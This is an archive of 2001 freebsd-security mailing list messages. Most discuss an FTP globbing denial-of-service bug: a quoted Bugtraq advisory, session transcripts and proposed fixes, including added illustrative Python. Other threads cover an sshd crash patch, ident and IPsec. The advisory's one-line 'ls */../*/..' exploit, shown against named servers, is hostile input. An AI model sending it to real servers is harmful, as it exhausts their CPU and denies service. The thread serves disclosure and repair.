There is of course a problem with this generalised optimisation:
/nonexistent/../existent/ succeeds where it shouldn't.

However, when you apply it to a glob, it is implied that '*/..' must
exist. In this case, I believe it is valid to remove any iteration
of '*/..' from the string. This may still, however, leave a crafty
combination of '?' that causes the same problem.

-Michael

>> Actually I think this highly depends on HOW MANY files and
>> directories FTPD can access.
>>
>> I didn't see any damage with a jailed FTPD with 1 directory and 2
>> files.
>
> The only reason you didn't see a problem was because you had
> only one directory.
>
> The DoS works via a simple mechanism.
>
> if you have a dir with two directories in it 'a' and 'b'
>
> */../ -> a/.. b/..
> */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..
>
> basically for each ../*/ you do a power N where N is the number
> of directories.

_________________________________________________________________
     http://fastmail.ca/ - Fast Free Web Email for Canadians
--------------Boundary-00=_XOKA015BHVCNTT4D7TH0--



From owner-freebsd-security  Fri Mar 16  5:52:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
	by hub.freebsd.org (Postfix) with ESMTP id 8A08037B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 05:52:37 -0800 (PST)
	(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
	by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id PAA16561
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 15:02:57 GMT
Message-Id: <200103161502.PAA16561@mailgate.kechara.net>
Date: Fri, 16 Mar 2001 13:56:08 -0000
To: freebsd-security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: Re: Multiple vendors FTP denial of service (fwd)
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

4.2-RELEASE, regular user, regular home directory

(snipped)

/../www/62.49.139.3_3-year.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.html
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/btareshit.png
www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
/../www/62.49.139.3_3.old
226 Transfer complete.
ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
ftp>




15/03/2001 22:21:16, Attila Nagy <bra@fsn.hu> wrote:

>FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
>-STABLE.
>
>---------- Forwarded message ----------
>Date: Thu, 15 Mar 2001 09:34:09 +0100
>From: "Frank DENIS (Jedi/Sector One)" <j@4U.NET>
>To: BUGTRAQ@SECURITYFOCUS.COM
>Subject: Multiple vendors FTP denial of service
>
>- Proftpd built-in 'ls' command has a globbing bug that allows remote
>denial-of-service.
>
>  Here's a simple exploit, tested on the Proftpd site :
>
>$ ftp ftp.proftpd.org
>...
>Name (ftp.proftpd.org:j): ftp
>...
>230 Anonymous access granted, restrictions apply.
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 Entering Passive Mode (216,10,40,219,4,111).
>421 Service not available, remote server timed out. Connection closed
>
>  That command takes 100% CPU time on the server. It can lead to an easy
>DoS even if few remote simultaneous connections are allowed.
>
>  Other FTP servers may be concerned as well. Here are various tries :
>
>- NetBSD FTP showed the same behavior as Proftpd :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>200 EPRT command successful.
>(long delay)
>421 Service not available, remote server timed out. Connection closed
>
>So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a
>possible DOS. Other BSD FTP may be affected as well.
>
>- Microsoft FTP Service (Version 5.0) also seems confused by the command :
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>500 'EPSV': command not understood
>227 Entering Passive Mode (207,46,133,140,4,223).
>200 PORT command successful.
>150 Opening ASCII mode data connection for file list.
>(very long delay... nothing happens...)
>
>- Publicfile refuses the command :
>
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>227 =131,193,178,181,97,222
>550 Sorry, I can't open that file: file does not exist.
>
>- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and
>displayed.
>
>- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
>expression to *" and the 'ls *' output.
>
>
>  Maintainers of vulnerable servers have been warned of this bug.
>
>--
>  -=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
>		LINAGORA SA (Paris, France) : http://www.linagora.com
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>

--

Lee Smallbone
Kechara Internet

lee@kechara.net
www.kechara.net 

Tel: (01243) 869 969
Fax: (01243) 866 685





From owner-freebsd-security  Fri Mar 16  5:59:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
	by hub.freebsd.org (Postfix) with ESMTP id A88D437B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 05:59:20 -0800 (PST)
	(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
	by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f2GDxH111551;
	Fri, 16 Mar 2001 14:59:17 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
To: lee@kechara.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Multiple vendors FTP denial of service (fwd) 
In-Reply-To: Your message of "Fri, 16 Mar 2001 13:56:08 GMT."
             <200103161502.PAA16561@mailgate.kechara.net> 
Date: Fri, 16 Mar 2001 14:59:17 +0100
Message-ID: <11549.984751157@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200103161502.PAA16561@mailgate.kechara.net>, Lee Smallbone writes:
>4.2-RELEASE, regular user, regular home directory
>
>(snipped)
>
>/../www/62.49.139.3_3-year.png
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/62.49.139.3_3.html
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/btareshit.png
>www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www
>/../www/62.49.139.3_3.old
>226 Transfer complete.
>ftp: 5740 bytes received in 0.11Seconds 52.66Kbytes/sec.
>ftp>

Now, try to create a 'foo' directory next to your 'www' directory...

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe    
Never attribute to malice what can adequately be explained by incompetence.



From owner-freebsd-security  Fri Mar 16  6:31: 3 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gyw.com (gyw.com [209.55.67.177])
	by hub.freebsd.org (Postfix) with ESMTP id 90AEE37B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 06:30:59 -0800 (PST)
	(envelope-from tjk@tksoft.com)
Received: from smtp3.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged))
	by gyw.com (8.8.8/8.8.8) with ESMTP id GAA26051;
	Fri, 16 Mar 2001 06:47:31 -0800
Received: (from tjk@tksoft.com)
	by smtp3.tksoft.com (8.8.8/8.8.8) id GAA17664;
	Fri, 16 Mar 2001 06:17:49 -0800
From: "tjk@tksoft.com" <tjk@tksoft.com>
Message-Id: <200103161417.GAA17664@smtp3.tksoft.com>
Subject: Re: Multiple vendors FTP denial of service (fwd)
To: bright@wintelcom.net (Alfred Perlstein)
Date: Fri, 16 Mar 2001 06:17:48 -0800 (PST)
Cc: apina@infolink.com.br (Antonio Carlos Pina),
	freebsd-security@FreeBSD.ORG
In-Reply-To: <20010315155234.G29888@fw.wintelcom.net> from "Alfred Perlstein" at Mar 15, 2001 03:52:34 PM
X-Info: None
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

One solution I can think of is to use a hash table for interpreting the
glob results, and count duplicate listings of directories/files. Then
truncate the results if the duplicates exceed x times valid keys in
the hash (or report an error, or both.) I don't know if there is a set
of hash routines available, but if not, one could use a tree (tsearch)
to accomplish the same.

All this depends on the file listings being first converted to the
shortest path to the file. I.e. "/etc/../etc/yadayada.txt" would become
"/etc/yadayada.txt" before being added to the list. I presume this is
already done.

The other solution is to always reduce the original path to its shortest
form, to avoid recursive listings of directories. Sounds like a simpler and
faster approach. If only someone had foolproof logic to accomplish
this. Removing certain strings might work.

Sounds like frustrating extra work, but since there is a problem, what
else are you going to do?


Troy



> 
> * Antonio Carlos Pina <apina@infolink.com.br> [010315 15:17] wrote:
> > Hello,
> > 
> > Actually I think this highly depends on HOW MANY files and 
> > directories FTPD can access.
> > 
> > I didn't see any damage with a jailed FTPD with 1 directory and 2 
> > files.
> 
> The only reason you didn't see a problem was because you had
> only one directory.
> 
> The DoS works via a simple mechanism.
> 
> if you have a dir with two directories in it 'a' and 'b'
> 
> */../ -> a/.. b/..
> */../*/.. -> a/../a/.. a/../b/.. b/../a/.. b/../b/..
> 
> basically for each ../*/ you do a power N where N is the number
> of directories.
> 
> How could this be fixed?  I think it's somewhat simple, 
> have glob() maintain a truncated version of paths and
> make sure that any collisions are detected.
> 
> Of course this is only speculation since I haven't looked
> at the code.
> 
> -- 
> -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
> 


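The blow-up Alfred Perlstein describes above (N to the power of the number of
'*/..' repetitions) and the two fixes proposed in this thread, Troy's
shortest-form-plus-duplicate-detection and Michael Richards' earlier idea of
stripping '*/..' out of the pattern, worked through in code.  This is an
example added for this archive, not code from the thread, from FreeBSD's ftpd
or from glob(3).  It walks a small constructed in-memory directory tree (FS,
with an empty directory 'c' to show the edge case), and the 'limit' cap on
examined candidates is an assumption of the example, not something any poster
proposed:

```python
import fnmatch
import posixpath
import re

# Constructed in-memory directory tree standing in for an ftp user's home
# directory (an assumption for this example, not a real filesystem).
# Names ending in '/' are subdirectories; 'c' is deliberately empty.
FS = {
    "/": ["a/", "b/", "c/", "README"],
    "/a": ["x.txt"],
    "/b": ["y.txt"],
    "/c": [],
}
GLOB_CHARS = re.compile(r"[*?\[]")


class TooManyMatches(Exception):
    """Raised when expansion examines more candidates than the caller allows."""


def entries(path):
    """Directory listing of a canonical path as (name, is_dir) pairs."""
    return [(e.rstrip("/"), e.endswith("/")) for e in FS.get(path, [])]


def expand(pattern, canonicalize=False, limit=None):
    """Expand a glob pattern one path component at a time, the way glob(3)
    walks it.  Returns (matches, candidates_examined).

    canonicalize=False keeps each matched path verbatim, so '*/..' repeated
    k times over N subdirectories yields N**k paths that all name the same
    directory.  canonicalize=True reduces every intermediate path to its
    shortest form and drops duplicates, so the work stays proportional to
    the number of distinct paths.  limit (an assumed safety cap, not an
    option from the thread) aborts the expansion once more than that many
    candidates have been examined.
    """
    paths = ["/"]
    examined = 0
    comps = [c for c in pattern.split("/") if c]
    for i, comp in enumerate(comps):
        last = i == len(comps) - 1
        nxt, seen = [], set()
        for p in paths:
            real = posixpath.normpath(p)      # what the server would stat()
            if GLOB_CHARS.search(comp):
                cands = [(n, d) for n, d in entries(real)
                         if not n.startswith(".") and fnmatch.fnmatchcase(n, comp)]
            elif comp == "..":
                cands = [("..", True)]        # always exists for a directory
            else:
                cands = [(n, d) for n, d in entries(real) if n == comp]
            for name, isdir in cands:
                examined += 1
                if limit is not None and examined > limit:
                    raise TooManyMatches(examined)
                if not last and not isdir:
                    continue                  # only directories are descended
                q = posixpath.join(p, name)
                if canonicalize:
                    q = posixpath.normpath(q)
                    if q in seen:
                        continue
                    seen.add(q)
                nxt.append(q)
        paths = nxt
    return paths, examined


def strip_glob_dotdot(pattern):
    """Michael Richards' pattern-side simplification: delete every '*/..'
    pair before expanding.  Unsound when '*' would match nothing, because
    then '*/..' matches nothing while the shortened pattern still does."""
    out = []
    for comp in (c for c in pattern.split("/") if c):
        if comp == ".." and out and out[-1] == "*":
            out.pop()
        else:
            out.append(comp)
    return "/".join(out) or "/"


def exceeds_limit(pattern, limit):
    """True if expanding pattern verbatim would examine more than limit
    candidates, i.e. a request the server should refuse outright."""
    try:
        expand(pattern, limit=limit)
    except TooManyMatches:
        return True
    return False


if __name__ == "__main__":
    dos = "*/../*/../*/.."
    print(len(expand(dos)[0]), "verbatim matches,",
          len(expand(dos, canonicalize=True)[0]), "after canonicalising")
    print("stripped:", strip_glob_dotdot("c/*/.."), "->",
          expand(strip_glob_dotdot("c/*/.."))[0],
          "but verbatim:", expand("c/*/..")[0])
```

With three subdirectories, '*/../*/../*/..' yields 27 verbatim paths (and the
count grows by a factor of 3 for every further '*/..') but a single path once
each intermediate result is reduced to its shortest form, which is the
property a glob implementation needs.  The pattern-side stripping is cheaper
but, as the 'c/*/..' case shows, it can return a path the original pattern
would not have matched, and it does nothing for the '?' variants Michael
warns about, whereas the canonical-form check handles any spelling of the
same directory.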


From owner-freebsd-security  Fri Mar 16  8:39:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mars.entic.net (mars.entic.net [63.125.62.132])
	by hub.freebsd.org (Postfix) with ESMTP id 0B09637B718
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 08:39:11 -0800 (PST)
	(envelope-from aj@entic.net)
Received: (qmail 18072 invoked by uid 100); 16 Mar 2001 16:39:07 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 16 Mar 2001 16:39:07 -0000
Date: Fri, 16 Mar 2001 08:39:07 -0800 (PST)
From: Anil Jangity <aj@entic.net>
To: <freebsd-security@freebsd.org>
Subject: Re: Multiple vendors FTP denial of service
In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>
Message-ID: <Pine.BSF.4.33.0103160832130.17245-100000@mars.entic.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris/All,

FTPD is run as root (at least on my machine). I don't want to limit root
resources, since I am not sure exactly what a good ballpark figure for
root would be...

I looked in ftpd(8) for some way to make it run as another user (at least
after it starts up) but no luck.

So, my question is, how do you propose we resource limit ftpd as you
suggest via login.conf?

Thanks

Anil

@ I'm pretty sure (but haven't tested) that resource limits will prevent
@ this problem.  Your ftpd shouldn't be using large amount of memory
@ under normal operating procedures, so you can set those to reasonable
@ values and not suffer any ill effects.
@
@ Kris
@





From owner-freebsd-security  Fri Mar 16  8:46:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
	by hub.freebsd.org (Postfix) with ESMTP id 8A91A37B719
	for <freebsd-security@freebsd.org>; Fri, 16 Mar 2001 08:46:46 -0800 (PST)
	(envelope-from mit@mitayai.net)
Received: (from root@localhost)
	by castle.dreaming.org (8.11.3/8.11.2) id f2GGkeu37698;
	Fri, 16 Mar 2001 11:46:40 -0500 (EST)
	(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
	by castle.dreaming.org (8.11.3/8.11.2av) with SMTP id f2GGkca37690;
	Fri, 16 Mar 2001 11:46:38 -0500 (EST)
	(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: "Peter McGarvey" <peterm@vianetworks.co.uk>,
	"freebsd-security" <freebsd-security@freebsd.org>
Subject: RE: What's vunerable?
Date: Fri, 16 Mar 2001 11:43:40 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNEEFNEMAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


inherited? need a lot of work? then assume everything is vulnerable due to
ex-employees, past trojan horses, bad administrative practices and
configurations, etc.

go through the FreeBSD Security Advisories at
http://www.freebsd.org/security/#adv for all the listed advisories.

make sure you pay attention to all the installed packages, ports, and
user-installed third-party stuff.

-Mit
:-----Original Message-----
:From: owner-freebsd-security@FreeBSD.ORG
:[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Peter McGarvey
:Sent: March 16, 2001 04:25 AM
:To: freebsd-security
:Subject: What's vunerable?
:
:
:I've just inherited several FreeBSD boxes.  The versions range from
:3.2_RELEASE to 4.1_RELEASE.
:
:On the BSD boxes I already maintain I cvsup and make world on a monthly
:basis - or as soon as I see a CERT advisory that I know relates to
:something that can bite.  But the inherited boxes need a lot of work,
:and I cannot guarantee to "The Powers That Be" that a make world won't
:break the box.
:
:What I really need to know is what vulnerabilities exist on each box -
:so that I can present the boss with a risk assessment, and make him
:decide if the box stays as is, or gets a make world.
:
:So any advice anyone can give me, on how to find out what's vulnerable
:with any particular FreeBSD version, would be greatly appreciated.
:
:--
:TTFN, FNORD
:
:Peter McGarvey
:System Administrator
:Network Operations, VIA Networks UK
:
:To Unsubscribe: send mail to majordomo@FreeBSD.org
:with "unsubscribe freebsd-security" in the body of the message
:
:




From owner-freebsd-security  Fri Mar 16  8:54:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220])
	by hub.freebsd.org (Postfix) with ESMTP id 4996537B718
	for <security@freebsd.org>; Fri, 16 Mar 2001 08:54:42 -0800 (PST)
	(envelope-from wes@softweyr.com)
Received: from [127.0.0.1] (helo=softweyr.com ident=4a656828bf96df23684bddfc4d0922ae)
	by homer.softweyr.com with esmtp (Exim 3.16 #1)
	id 14dxS9-0000Ko-00; Fri, 16 Mar 2001 09:51:50 -0700
Message-ID: <3AB244A5.315DFD16@softweyr.com>
Date: Fri, 16 Mar 2001 09:51:49 -0700
From: Wes Peters <wes@softweyr.com>
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams <nate@yogotech.com>
Cc: Adam Laurie <adam@algroup.co.uk>,
	Ronan Lucio <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: Re: Port 113
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
		<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
		<15025.5630.472269.543769@nomad.yogotech.com>
		<3AB1261F.23B8BE75@algroup.co.uk> <15025.10176.676792.32675@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams wrote:
> 
> > > > Could anybody say me when I need to allow the port 113
> > > > in the firewall?
> > >
> > > *Need* for auth is a strong word.  However, it does tend to speed up
> > > email transfers if you enable a version that always responds true.
> > >
> > > So, any external SMTP servers you have *should* have this port enabled.
> > >
> > > > What services use this port?
> > >
> > > I know that SMTP uses it, and I believe that ftpd uses it, and I believe
> > > irc also uses it.
> >
> > smtp does not need to use it - you can achieve the same speedy transfers
> > by telling your smtp server not to bother. e.g. for sendmail:
> >
> >   O Timeout.ident=0s
> 
> My local sendmail doesn't use *my* ident server, but remote sendmail
> servers use *my* ident server, so using ident locally speeds up mail
> transfers *to* my host.
> 
> I certainly don't use ident for local email. :)

To quote a relatively unknown identd server, "Fools trust ident!"

-- 
            "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/



From owner-freebsd-security  Fri Mar 16  9:57: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silver.teardrop.org (silver.teardrop.org [205.181.101.128])
	by hub.freebsd.org (Postfix) with ESMTP id 8368837B71D
	for <security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:57:00 -0800 (PST)
	(envelope-from snow@teardrop.org)
Received: (from snow@localhost)
	by silver.teardrop.org (8.11.2/8.11.1) id f2GHtWC66126;
	Fri, 16 Mar 2001 12:55:33 -0500 (EST)
	(envelope-from snow@teardrop.org)
Date: Fri, 16 Mar 2001 12:55:32 -0500
From: James Snow <snow@teardrop.org>
To: Kris Kennaway <kris@obsecurity.org>
Cc: Brooks Davis <brooks@one-eyed-alien.net>,
	Alex Popa <razor@ldc.ro>, security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010316125532.A65814@teardrop.org>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010312152215.A94640@mollari.cthul.hu>; from kris@obsecurity.org on Mon, Mar 12, 2001 at 03:22:15PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Mar 12, 2001 at 03:22:15PM -0800, Kris Kennaway wrote:
> On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote:
> > On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> > > I am not really sure what this means (could mean a lot of things, 
> > > including bad memory on my machine), but here are the facts:
> > 
> > This reminds me of something I noticed during the last discussion of
> > ssh I got involved in and completely forgot about.  If you create an
> > account with a bad shell (say, /bin/false) and run the following command
> > you get an immediate sshd core dump:
> > 
> > ssh -t xxx@localhost /bin/sh
> > 
> > Attempting to run gdb on the core appears to show that I'm in:
> > 
> > #0  0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
> > 
> > but the binary is stripped so I don't know and my /usr/obj is out of
> > sync with my world at the moment so I figure running gdb against the
> > unstripped binary is not productive.
> 
> There's a PR open about this and Brian is looking into it -
> indications are it's a simple bug and not a security problem, denial
> of service or otherwise.

I don't know whether or not it's exploitable, but I just ran up against
this myself today. You can reproduce it by using ssh version 2 and giving 
sshd an invalid username.

The problematic code is in src/crypto/openssh/auth2.c in 
input_userauth_request:

    208                 pw = getpwnam(user);
    209                 if (pw && allowed_user(pw) && strcmp(service, 
                            "ssh-connection")==0) {
    210                         authctxt->pw = pwcopy(pw);
    211                         authctxt->valid = 1;
    212                         debug2("input_userauth_request: setting up 
                                        authctxt for %s", user);
    213 #ifdef USE_PAM
    214                         start_pam(pw);
    215 #endif
    216                 } else {
    217                         log("input_userauth_request: illegal user %s", 
                                     user);
    218                 }

If you supply an invalid username, this line:

    208                 pw = getpwnam(user);

will set pw to null.

The if statement at line 209:

    209                 if (pw && ...

will fail immediately because pw is null, and the code skips to:

    216                 } else {
    217                         log("input_userauth_request: ...
    218                 }

Things fall down and go boom here:

    231         if (authctxt->pw != NULL) {
    232                 lc = login_getpwclass(authctxt->pw);

authctxt->pw never gets set to anything unless you enter the if, which
we don't because of the pw pointer being null. So it points off into
space, and login_getpwclass will cause a SIGSEGV when it tries to
dereference it.

My fix for this was to stick a 'authctxt->pw = NULL;' in the else block:

    216                 } else {
    217                         log("input_userauth_request: ...
    218                         authctxt->pw = NULL;
    219                 }

Then you get this:

	input_userauth_request: illegal user nonexistant
	Failed password for NOUSER from 198.76.121.128 port 3150 ssh2

instead of this:

	input_userauth_request: illegal user nonexistant
	Segmentation fault (core dumped)

I don't think this fix is ideal, as I think the log entry should
continue to show the username the client tried to login with and not
'NOUSER,' but it will certainly close the hole, if indeed it is one. At
least I'll sleep better tonight.

I wasn't able to reproduce this under Linux and it doesn't occur using
ssh1. 

Also, is anyone going to fix the pipe bug in sshd that causes all those
annoying "Broken pipe" errors? I know there's a patch out there for it.


-Snow



From owner-freebsd-security  Fri Mar 16  9:58: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34])
	by hub.freebsd.org (Postfix) with ESMTP id 8CB3237B719
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:57:58 -0800 (PST)
	(envelope-from ume@FreeBSD.org)
Received: from localhost (IDENT:WR7wH86hkIS8CelPaXz3tP2/ovMRPW3y3dykVc1g8qX7AIRgsIQKw4zDFsROLHAt@localhost [::1])
	(authenticated as ume with CRAM-MD5)
	by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f2GHs2R54078;
	Sat, 17 Mar 2001 02:54:03 +0900 (JST)
	(envelope-from ume@FreeBSD.org)
Date: Sat, 17 Mar 2001 02:53:58 +0900 (JST)
Message-Id: <20010317.025358.74704976.ume@FreeBSD.org>
To: itojun@iijlab.net
Cc: jomor@ahpcns.com, mburgett@awen.com, freebsd-security@FreeBSD.ORG
Subject: Re: IPSEC tunnel without gif?
From: Hajimu UMEMOTO <ume@FreeBSD.org>
In-Reply-To: <19427.984720576@coconut.itojun.org>
References: <3AB18AAC.9069CBF2@ahpcns.com>
	<19427.984720576@coconut.itojun.org>
X-Mailer: xcite1.38> Mew version 1.95b97 on Emacs 20.7 / Mule 4.0
 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?=
X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc
X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91  05 D0 B3 EF 36 9B 6A BC
X-URL: http://www.imasy.org/~ume/
X-OS: FreeBSD 5.0-CURRENT
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> On Fri, 16 Mar 2001 14:29:36 +0900
>>>>> itojun@iijlab.net said:

>> >The gateway that received the pings was transmitting ARP
>> >requests but strangely, it was trying to get the hardware
>> >address of the other tunnel endpoint rather than that of
>> >the router in the middle. Since the ARP requests were never
>> >answered, the ping response was never transmitted.

itojun> 	so you are seeing ARP for tunnel inner addresses?

itojun> http://www.kame.net/dev/cvsweb.cgi/kame/kame/sys/netinet6/ipsec.c.diff?r1=1.84&r2=1.85

itojun> 	should fix the above issue.  not sure about freebsd merge status.

Since there seemed to be no feedback from the originator of KAME PR 233, I had
held off merging it from KAME.  I just committed it.

http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet6/ipsec.c.diff?r1=1.9&r2=1.10

--
Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
ume@mahoroba.org  ume@bisd.hitachi.co.jp  ume@{,jp.}FreeBSD.org
http://www.imasy.org/~ume/



From owner-freebsd-security  Fri Mar 16  9:59:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.rpi.edu (mail-100baset.rpi.edu [128.113.26.45])
	by hub.freebsd.org (Postfix) with ESMTP id 0B15437B71C
	for <freebsd-security@FreeBSD.ORG>; Fri, 16 Mar 2001 09:59:38 -0800 (PST)
	(envelope-from drosih@rpi.edu)
Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47])
	by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id MAA91764;
	Fri, 16 Mar 2001 12:59:35 -0500
Mime-Version: 1.0
X-Sender: drosih@mail.rpi.edu
Message-Id: <p05010402b6d8036d7f8a@[128.113.24.47]>
In-Reply-To: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
References: <3AB1DBF9.C721E3D6@vianetworks.co.uk>
Date: Fri, 16 Mar 2001 12:59:34 -0500
To: Peter McGarvey <peterm@vianetworks.co.uk>,
	freebsd-security <freebsd-security@FreeBSD.ORG>
From: Garance A Drosihn <drosih@rpi.edu>
Subject: Re: What's vunerable?
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 9:25 AM +0000 3/16/01, Peter McGarvey wrote:
>I've just inherited several FreeBSD boxes.  The versions range
>from 3.2_RELEASE to 4.1_RELEASE.
>
>On the BSD boxes I already maintain I cvsup and make world on
>a monthly basis - or as soon as I see a CERT advisory that I
>know relates to something that can bite.  But the inherited
>boxes need a lot of work, and I cannot guarantee to "The Powers
>That Be" that a make world wont break the box.

I would buy one new box.  Use that to build a new version of
one of your existing boxes, and replace that system.  If nothing
breaks, you're in good shape.  If something breaks, you still
have the original box to fall back on.  Fix whatever breaks
until all the pieces are up and working.

Then use that box to build the replacement for the next system.
Repeat process.

I would feel much safer with machines built from scratch, where
you know what's on them and how they got that way.  Also, if
you have a wide variety of systems like that, it is almost
certain that at least one of them will "have issues" if you
try to just upgrade them in place with the latest buildworld.
Not necessarily due to the buildworld process itself, but
because you don't know the current state of those machines,
and you don't know what customizations have been done and
why they were done.

-- 
Garance Alistair Drosehn            =   gad@eclipse.acs.rpi.edu
Senior Systems Programmer           or  gad@freebsd.org
Rensselaer Polytechnic Institute    or  drosih@rpi.edu



From owner-freebsd-security  Fri Mar 16 10:29:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13])
